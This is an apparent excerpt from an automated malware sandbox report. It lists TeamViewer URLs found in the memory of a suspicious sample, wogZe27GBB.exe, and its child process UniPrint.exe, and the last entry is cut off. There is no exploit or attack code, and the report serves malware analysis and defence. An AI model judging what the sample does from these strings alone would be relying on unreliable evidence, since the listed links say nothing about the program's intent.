Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000001.248636315.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000004.00000002.551625203.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000002.350593639.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000002.355308104.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.372774067.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000001.366478511.0000000010000000.00000002.00020000.sdmpString found in binary or memory: http://www.teamviewer.com/download/version_4x/TeamViewerQS.exe
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000001.248636315.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000004.00000002.551625203.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000002.350593639.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000002.355308104.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.372774067.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000001.366478511.0000000010000000.00000002.00020000.sdmpString found in binary or memory: http://www.teamviewer.com/download/version_5x/TeamViewerQS.exe
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000001.248636315.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000004.00000002.533082315.00000000028DE000.00000004.00000001.sdmp, UniPrint.exe, 00000004.00000002.551625203.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000002.350593639.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000002.355308104.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.372774067.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000001.366478511.0000000010000000.00000002.00020000.sdmpString found in binary or memory: http://www.teamviewer.com/favicon.ico
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000001.248636315.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000004.00000002.551625203.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000002.350593639.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000002.355308104.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.372774067.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000001.366478511.0000000010000000.00000002.00020000.sdmpString found in binary or memory: http://www.teamviewer.com/help/connectivity.aspx:
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000001.248636315.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000004.00000002.551625203.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000002.350593639.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000002.355308104.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.372774067.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000001.366478511.0000000010000000.00000002.00020000.sdmpString found in binary or memory: http://www.teamviewer.com/help/support.aspxK
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000001.248636315.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000004.00000002.551625203.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000002.350593639.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000002.355308104.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.372774067.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000001.366478511.0000000010000000.00000002.00020000.sdmpString found in binary or memory: http://www.teamviewer.com/ja/company/shutdown.aspx
Source: UniPrint.exe, 00000004.00000002.531799578.00000000027A0000.00000004.00000001.sdmp, UniPrint.exe, 00000004.00000002.533082315.00000000028DE000.00000004.00000001.sdmpString found in binary or memory: http://www.teamviewer.com/ja/company/shutdown.aspx?version=
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000001.248636315.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000004.00000002.551625203.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000002.350593639.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000002.355308104.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.372774067.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000001.366478511.0000000010000000.00000002.00020000.sdmpString found in binary or memory: http://www.teamviewer.com/ja/integrated/trial.aspx?ID=%1%&IC=%2%
Source: UniPrint.exe, 00000004.00000002.531799578.00000000027A0000.00000004.00000001.sdmpString found in binary or memory: http://www.teamviewer.com/ja/licensing/commercialuse.aspx
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000001.248636315.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000004.00000002.551625203.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000002.350593639.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000002.355308104.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.372774067.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000001.366478511.0000000010000000.00000002.00020000.sdmpString found in binary or memory: http://www.teamviewer.com/licensing/commercialuse.aspx
Source: wogZe27GBB.exe, 00000000.00000002.249977662.0000000002868000.00000004.00000001.sdmp, UniPrint.exe, 00000002.00000001.248636315.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000004.00000002.551625203.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000010.00000002.350593639.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000011.00000002.355308104.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000012.00000002.372774067.0000000010000000.00000002.00020000.sdmp, UniPrint.exe, 00000014.00000001.366478511.0000000010000000.00000002.00020000.sdmpString found in binary or memory: http://www.teamviewer.com/licensing/register.aspx&http://www.teamviewer.com/r$$id$$.aspx7http://www.
Source: svchost.exe, 00000009.00000002.512367598.0000026C67243000.0000000